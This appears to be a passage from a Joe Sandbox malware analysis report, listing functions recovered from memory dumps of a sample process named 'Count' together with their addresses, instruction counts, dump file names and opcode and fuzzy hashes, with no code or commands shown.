Opcode ID: cb5087222feefd09086886859c2a1a36f341b044721beb1bc9e546e6b0596cca
Instruction ID: 22939b5e56b7de64a8e53f045715c7ce2d2ca6719f47061f32d4c58e7e1676a8
Opcode Fuzzy Hash: cb5087222feefd09086886859c2a1a36f341b044721beb1bc9e546e6b0596cca
Instruction Fuzzy Hash: 2A812835A00618CFCB54DF69C48499EB7F6FF88350B1685A9E81ADB361DB30ED42CB90

Function 05515FA8 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71aa046bebc05090afbecafe94985ee2c18bf45dd64f9860250f091527c84752
Instruction ID: 3911e40503827dc08e193d9fa5a22231cc46af852c02dce95693b30a7d702c43
Opcode Fuzzy Hash: 71aa046bebc05090afbecafe94985ee2c18bf45dd64f9860250f091527c84752
Instruction Fuzzy Hash: 74813B74A00219CFDB64DF68D854BEDBBB6FB88300F1080A9D849A7794DB305E8ADF45

Function 05515F98 Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: deb25b95d22076fbefcb866e41d03693a6bbba3ea87eebf6a7ea08ce3476503d
Instruction ID: 6e4caa8a0298a76b4e77d32f8f79e760ac46ce6cdb111f17b0e43c9d273feb1e
Opcode Fuzzy Hash: deb25b95d22076fbefcb866e41d03693a6bbba3ea87eebf6a7ea08ce3476503d
Instruction Fuzzy Hash: 45711974A00219CFDB64DF68D854BDDBBB2FB88300F1084A9D849A7754DB305E8ADF45

Function 061DBFB8 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f6acee88e4be7ac57b9866b0b5d14253a208bd138099884565fad8aeebfc6b3
Instruction ID: 9fd499ec5ab9da64f3c1cef28f00f3275bc7fdc03bf3e1eec98f6ff3a084a400
Opcode Fuzzy Hash: 4f6acee88e4be7ac57b9866b0b5d14253a208bd138099884565fad8aeebfc6b3
Instruction Fuzzy Hash: 41514C34B406199FCB04AF64E498EAEB7B6FF88711F008119E9079B364DF749947CB81

Function 0551F568 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ac42b650217b186d6b223fa7ca25caf4a12132eb640cb8161bce3d665a8cc60
Instruction ID: 2eb399861c57963fceda86b4af407b9117ad1c9e6ce6c2f6194ea82a0592be39
Opcode Fuzzy Hash: 1ac42b650217b186d6b223fa7ca25caf4a12132eb640cb8161bce3d665a8cc60
Instruction Fuzzy Hash: 69511B70E01608DFDB44DFA9D885AAEBBF6FF89300F11842AE415A7364DB309945CF95

Function 061D3AC8 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 733aa34fce6706242dd5e8b6490a5c35ae37c6f97207afc3e9838760130ac14e
Instruction ID: 32ba3c12bac4a7421d4467f753151412e0c66eba315122c5aaf99e581a72cf24
Opcode Fuzzy Hash: 733aa34fce6706242dd5e8b6490a5c35ae37c6f97207afc3e9838760130ac14e
Instruction Fuzzy Hash: C8418A30B00619CFDB54DF68D884F6AB7F6EB85300F14C429E826AB394DB31E845CB91

Function 061E7090 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041896247.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61e0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0a7ad826731fb9f1c361b5fb6be796cdca423022e3b0d504c1b77921bf5fcfa
Instruction ID: 166c884fffbb713cc5acd90eabdffa715584464c75b71350b318663e13da7099
Opcode Fuzzy Hash: c0a7ad826731fb9f1c361b5fb6be796cdca423022e3b0d504c1b77921bf5fcfa
Instruction Fuzzy Hash: 8C51E770E01208CFEB58DFB9D954A9DBBF2BF88304F208529E405AB390DB319946CF41

Function 061E7080 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041896247.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61e0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0900a01648349bfb2dc8cc542444811c57a31670fc8457c8194ad13ddccfbc4
Instruction ID: eac48625d3eeb2631deee60a2086648d93ce48694916f20d7ed914ff6c3aea02
Opcode Fuzzy Hash: a0900a01648349bfb2dc8cc542444811c57a31670fc8457c8194ad13ddccfbc4
Instruction Fuzzy Hash: 5141B770E01608DFDB58DFB9D8946DDBBB2BF89304F248529D419AB3A1DB319942CF41

Function 0551E958 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e000e9a824172b0d264af7ac2805fe37bc24c75655704bcb0cd611be6949998
Instruction ID: 2b0f1e1c6b583c951609c1ccda13e38ad0ac1db47ac9eb4853424a033fcfb9d7
Opcode Fuzzy Hash: 7e000e9a824172b0d264af7ac2805fe37bc24c75655704bcb0cd611be6949998
Instruction Fuzzy Hash: 5F413E70D00609DBDB44DFA9D8419EDFFBAFF89300F10992AE81AB3250DB306985CB95

Function 061DEB90 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb4fbd8add33de6f7d83c52538872c46dae239447feb1c94c2bdd63e14f7b972
Instruction ID: 60d0d1cbbfa499cf439e7083b35f783ef544327b26ea575797020e6a623e2308
Opcode Fuzzy Hash: eb4fbd8add33de6f7d83c52538872c46dae239447feb1c94c2bdd63e14f7b972
Instruction Fuzzy Hash: C531E636A10114DFCB45DF58D888E99BBB2FF48321B1680A9E60A9F372C731ED55DB40

Function 061D3C58 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8daff64d208325c068c25cc687f4d3b4b4ea8c8ef682ad141fa601e81f21caf
Instruction ID: ad1db0d8b17046b5bc5c2be036e34663cb5e851fa185ce0e1a7630b979107533
Opcode Fuzzy Hash: d8daff64d208325c068c25cc687f4d3b4b4ea8c8ef682ad141fa601e81f21caf
Instruction Fuzzy Hash: 9741CD31E006268FDB94CFA5C844AAEBBF1FF89750F10852AD526E7260E734D945CF92

Function 061EF578 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041896247.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61e0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a08998aede518d52530997741fdc7d5dc56db44479b74d0ff435e66110d86049
Instruction ID: f4a6241187d94d7e1f6cdedb88e8b8073a0073fd51c395135fb5eecfe63364e5
Opcode Fuzzy Hash: a08998aede518d52530997741fdc7d5dc56db44479b74d0ff435e66110d86049
Instruction Fuzzy Hash: BC41F4B0E00608DFDB48DFA9D444AEDBBB6FB89300F10C465D905A7394DB749A86CF91

Function 0551818B Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74901b5cebe43b82a881f3fa627853f7af178df3160aa801fdf4983bcdc8770d
Instruction ID: 13d8f7610ed437d4ea7af103c83bd2b5d035e7c4b5d511cd05b73b46f5a09ba6
Opcode Fuzzy Hash: 74901b5cebe43b82a881f3fa627853f7af178df3160aa801fdf4983bcdc8770d
Instruction Fuzzy Hash: 06318B70908209DFDB11DFE8D8546EEBFB5FF4A300F1084A9E855AB291CB745A49CF92

Function 061D886C Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ed0bb5aac08d20db4ac70a51124a4b8c396337257fd6cd5a61e7fc1583ee88a
Instruction ID: 2566420e6c7c1adcc383b41a20ff900d5f9f0c6a2c9a552966b6439d2347accf
Opcode Fuzzy Hash: 2ed0bb5aac08d20db4ac70a51124a4b8c396337257fd6cd5a61e7fc1583ee88a
Instruction Fuzzy Hash: BC31D1313002048FDB559F28D894AAE7BA2EF80340F1485AAE402CF3A6CB34DD86C791

Function 061D6262 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 912979241da075e2556136d5201b57275221ba204457018007e29779ccc55635
Instruction ID: 5bbcfc002332de1545b90715d3fee90bf82f49c9a7e19af05fa4f1ea4f2d4267
Opcode Fuzzy Hash: 912979241da075e2556136d5201b57275221ba204457018007e29779ccc55635
Instruction Fuzzy Hash: 34318930B007109FCB69EF25D84456ABBB2FF85355B14446CE9578B3A4DB31E886CB90

Function 00B62338 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2028757237.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b60000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43b8661b3793bf1aa6f4acbe28d5289bea0dc72e75c6823a399a086d9292a1c3
Instruction ID: 4b12e3a9000281ca12e13ab3f084b2e3a6e5cacdf763f220e6f7526b4375fa5c
Opcode Fuzzy Hash: 43b8661b3793bf1aa6f4acbe28d5289bea0dc72e75c6823a399a086d9292a1c3
Instruction Fuzzy Hash: 6631F2B0D006099FEB44DF99D4497AEBBB9FB85300F10C0A9D101AA7A5CB7C4A89CF56

Function 00B6147D Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2028757237.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b60000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9b362449a57a54432c1ba23ee19a0c5690fa783d54e066402cb1f7c60227fd6
Instruction ID: 73d694ef78b4e98068e0b61e0f3ac6519f059009f36c2273a800772e389a218a
Opcode Fuzzy Hash: d9b362449a57a54432c1ba23ee19a0c5690fa783d54e066402cb1f7c60227fd6
Instruction Fuzzy Hash: CD312AB1D002589FDB14DFA9C590ADEFFF1EF88340F248469E90AAB250DB349946CF90

Function 00B62348 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2028757237.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b60000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5934b4c504ebd7075b32622e8520db1a2e7cb8705bdf17c9d913eb3e0294911b
Instruction ID: 662f1592e5099e3c1cc51f433e584865e251a98b26924999507ad38cb7602d20
Opcode Fuzzy Hash: 5934b4c504ebd7075b32622e8520db1a2e7cb8705bdf17c9d913eb3e0294911b
Instruction Fuzzy Hash: 4B31F2B0D006099FEB08DB99D4487AEB7F9FB48300F10C0A9D204AA7A5CB7C4A85CF56

Function 00B61488 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2028757237.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b60000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48393f9510468ab4138e2d65248fc729bd775c3e48a81d3f697705bc6ae33649
Instruction ID: 63763c215f4f767aa51a678c3d8dc12192b0475bf28148b67c73dfb5423e1101
Opcode Fuzzy Hash: 48393f9510468ab4138e2d65248fc729bd775c3e48a81d3f697705bc6ae33649
Instruction Fuzzy Hash: 7B3139B0D002589FCB14CFA9C580ADEFFF5EF88300F288469E90AAB250DB349945CF90

Function 0551BD8D Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc67ce6e0d51b6f15b4b20d8440d7f80d43d2300defa24d8f22a4718abf0399c
Instruction ID: 2c962570764103f34577af55ec736f7eb5ed487542a2d967e021a69003964d2a
Opcode Fuzzy Hash: dc67ce6e0d51b6f15b4b20d8440d7f80d43d2300defa24d8f22a4718abf0399c
Instruction Fuzzy Hash: 1F41C274A052188FEBA4CF18D844BD9BBB5FB49310F1081E9E40DA76A4DB315EC9CF45

Function 061D31B0 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52137aa57d166a073c253177429f3b218bcd35f98047e8806799dc766a3b40e4
Instruction ID: a692339ee80c1c06442fff04f352bac8d4eb1c20149f32c698eb0ca426fe134b
Opcode Fuzzy Hash: 52137aa57d166a073c253177429f3b218bcd35f98047e8806799dc766a3b40e4
Instruction Fuzzy Hash: 9A210835A043905FCB559F749C107FA7FF1AF87600F04416AE176EB291CB348541CBA1

Function 061DCD58 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1363a1fb9fc6e454d60bbdddf459db32b7a4af50cb4a16336c2bb614f2818f5d
Instruction ID: 5b257026b2d22915bd10cb2cca8a9240b0e1f793b057f35ccc45b944352a0825
Opcode Fuzzy Hash: 1363a1fb9fc6e454d60bbdddf459db32b7a4af50cb4a16336c2bb614f2818f5d
Instruction Fuzzy Hash: 9A21D232741A008FD7709B69EC84A66BBE9EFC0361B05887AE10EC7551DB34E842C7D0

Function 0551BC8D Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07122eaafc56fe1fc56fd307d683e830cfbd6179a2fd535792005ff116b9373a
Instruction ID: 8e4b69cc17fb24c7d91246f59996b9946c435104cb0a63c9f275812401408231
Opcode Fuzzy Hash: 07122eaafc56fe1fc56fd307d683e830cfbd6179a2fd535792005ff116b9373a
Instruction Fuzzy Hash: CB41BFB4A05628CFEBA0DF28D880BD9BBB1FB49310F1081E9D84DA7254DB715E89CF45

Function 0551BEDE Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c30d224abe9ea48e35634417296ceb81b328c93fcfc5bb5f27a0cca2cd64d2a4
Instruction ID: 46a47e5b5bec5b9a6ca71e25e9bd5e9f9ac5324c5c8dd1c8c0199cb4a39c468e
Opcode Fuzzy Hash: c30d224abe9ea48e35634417296ceb81b328c93fcfc5bb5f27a0cca2cd64d2a4
Instruction Fuzzy Hash: 13419D74A05228CFEBA0DF18D980BD9BBB6FB49310F1081EAD80DA7654DB315E89CF45

Function 0551C124 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96bdfc8e6e64cfa9c0311776d64e98c9db907430f1a0dad4d320ff804f9c78a4
Instruction ID: 512af5670905ae45eb96e41715a5054e5f6ddb98388cb9a78765c39677e8c1db
Opcode Fuzzy Hash: 96bdfc8e6e64cfa9c0311776d64e98c9db907430f1a0dad4d320ff804f9c78a4
Instruction Fuzzy Hash: EB41A174A012288FEBA0DF18D990BD9BBB1FB49310F1081E9D80DA7794DB315E89CF45

Function 061D2418 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1025d9ae9e0eb427ed6f1ee59dad6414ba8a56ab4580332ebdff6bc1020b27e3
Instruction ID: 7c12331beabdbcfa68e993af69f9337b6e67adfd6884f2e3e40cd73fd7b599d6
Opcode Fuzzy Hash: 1025d9ae9e0eb427ed6f1ee59dad6414ba8a56ab4580332ebdff6bc1020b27e3
Instruction Fuzzy Hash: 58216D35A04119DFDB558FA8C9449DEBBB2EF8D320F148129E926A7394DB718981CFA0

Function 0551BB30 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e25f03cccfdf4b52ef35ffd521513624338ec61dec51b1b2a1a6abee665ea74
Instruction ID: 8f8b64a15a62613f5abc8dcc58fdb947130fb64a85dd2013e090b4441fa93ed7
Opcode Fuzzy Hash: 1e25f03cccfdf4b52ef35ffd521513624338ec61dec51b1b2a1a6abee665ea74
Instruction Fuzzy Hash: D8310670905228CBEBA4DF19DC44BE9BBB6FB89310F0081E9D40DA7694DB305E88CF85

Function 0551D3DB Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9d14a1cb633301fd4a9ca16497aa7b1c9b0a351dc70e382a1b5b4317a80c53e
Instruction ID: 635c991b5c41261d3e9c9e648ab582bbdbab4eaa3eaa7e0167e2e8a4693bdabb
Opcode Fuzzy Hash: a9d14a1cb633301fd4a9ca16497aa7b1c9b0a351dc70e382a1b5b4317a80c53e
Instruction Fuzzy Hash: 35318070E04208DFDB44CFA9D841AEEBBF2BB89300F14C065D805AB365DBB4A946CF90

Function 061D60E0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f19d337827cc94cec5141e8ac7ecb1fc7c2cd361db9b535e4ab13563e2ec344e
Instruction ID: 4284fb4ab679d47a3e9d71f7d6aa4ba69c89294b742e5cf2ea1672fbbbe9d560
Opcode Fuzzy Hash: f19d337827cc94cec5141e8ac7ecb1fc7c2cd361db9b535e4ab13563e2ec344e
Instruction Fuzzy Hash: 1C215971E00219DFEB84DFB8C804BAEBBF5AB84240F108466D519DB292E738DA45CBD1

Function 065F1AE2 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2042446365.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_65f0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fe25381327e2a53d3ac4fe253177f09706d067789f7ca45a56a26d073b9f2c8
Instruction ID: ff26ed41defed1f30bd89ee5f459c130ab97973cad952593f0f639ba35aceacb
Opcode Fuzzy Hash: 5fe25381327e2a53d3ac4fe253177f09706d067789f7ca45a56a26d073b9f2c8
Instruction Fuzzy Hash: A341D174A04229CFCBA4DF28C898AD9B7F5FB48300F1081E9E519A7694EB309EC59F41

Function 0081D030 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2026518919.000000000081D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0081D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_81d000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e656509c238c389492cccce9edfb21c553df2afe2bf57248e8aa17797c91681
Instruction ID: e519b6bcffe57543f8e0d836a6ad8f89a0be5a73c6f4a78fe120efa58355fa8b
Opcode Fuzzy Hash: 1e656509c238c389492cccce9edfb21c553df2afe2bf57248e8aa17797c91681
Instruction Fuzzy Hash: 07212571504704DFCB10DF14D9C4B67BFA9FF88314F20C169D8098B246C336D886CAA2

Function 0551BBA4 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b793637ce060cd6a70fbf5be0d8eddceff16af274b96e10f2901d2aade76ef5
Instruction ID: 845a75efbf8b919c6324feb42be0a242900d14137f25fd1aa2c6512b0288fecb
Opcode Fuzzy Hash: 7b793637ce060cd6a70fbf5be0d8eddceff16af274b96e10f2901d2aade76ef5
Instruction Fuzzy Hash: D541B074A01228CFEBA0DF28D994BD9BBB2FB49314F1081E9D40DA7655DB305E89CF45

Function 055181C8 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfbe667fb700fc02a0e1e8dd5f35253fccf71deb1e88e4f87d59643dc9af332c
Instruction ID: 464b17aaad43b95f49f433af1fa4d08bf76b831c2959e99737324af501affd49
Opcode Fuzzy Hash: cfbe667fb700fc02a0e1e8dd5f35253fccf71deb1e88e4f87d59643dc9af332c
Instruction Fuzzy Hash: 93218B70904609DFDB01CFE8E8546EEBBB5FB49300F108469D454AB291CB741A49CF92

Function 00B60B70 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2028757237.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b60000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1dd5c8c27b3e0667e10ef7807ae0ea93eb109e566075cb5154246b942f89dfb
Instruction ID: 5361f02bacc088367fcdcbe88e13c1746af71ce71c9d6aa1421048879e401c73
Opcode Fuzzy Hash: a1dd5c8c27b3e0667e10ef7807ae0ea93eb109e566075cb5154246b942f89dfb
Instruction Fuzzy Hash: 6321BC30B002408FCB05EB7998545BD7BF2FFCA301B15456ED00ADB3A5DB39984A8B92

Function 0551BB23 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b43f6100b7c219c1a4bb4e9bc6292e60f72462f16af8fc0da7571883ec97fc4d
Instruction ID: 0bc7e657ffc103e6d53217f106362016f4f05dbb8ed64f6070d6d2faaaecce1e
Opcode Fuzzy Hash: b43f6100b7c219c1a4bb4e9bc6292e60f72462f16af8fc0da7571883ec97fc4d
Instruction Fuzzy Hash: D7310874905228CBEBA4CF28DD44BD9BBB5FB89310F0085E9D84DA76A4CB705E88CF45

Function 055182E0 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81fc9d53a9860fecdd32cad20f95b32d4187fb8aa77941a43f2fad1d3123d362
Instruction ID: 3954ed86cdf53e671c132ef10ff75f5ff7649c00a1ca31460676f08d02138a5f
Opcode Fuzzy Hash: 81fc9d53a9860fecdd32cad20f95b32d4187fb8aa77941a43f2fad1d3123d362
Instruction Fuzzy Hash: 07219C70A04609CFCB01DFE8E850AEE7BB5FF8A300F1044A9D455EB291CB344A49CF52

Function 061D1F68 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86ae1dab3b247b432634c6091e8cba94ed259f76f9a0cd6c6596792fae507a6b
Instruction ID: 4979d0e0e28bf828b79305406f5a55f1dcd8836773382607f87bf66cda91ca77
Opcode Fuzzy Hash: 86ae1dab3b247b432634c6091e8cba94ed259f76f9a0cd6c6596792fae507a6b
Instruction Fuzzy Hash: 2E11E9516092E45FC39A5778541506D7FA6EFC2300B1944AEE186CF6D2CF249D05C3AB

Function 0551D70B Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a683c2facb1862963365f3e89b7e2493209b4da096b1c747f43c36227038bb7d
Instruction ID: 77be11563f9b405c15ed2521f4394e579579440f16abedeab303d58b23f2f0bf
Opcode Fuzzy Hash: a683c2facb1862963365f3e89b7e2493209b4da096b1c747f43c36227038bb7d
Instruction Fuzzy Hash: FD216970E04209DFDB44DFA9D844AAEBBF2BB89300F14846AD41AA7261EB345A45CFD5

Function 0551D3E8 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

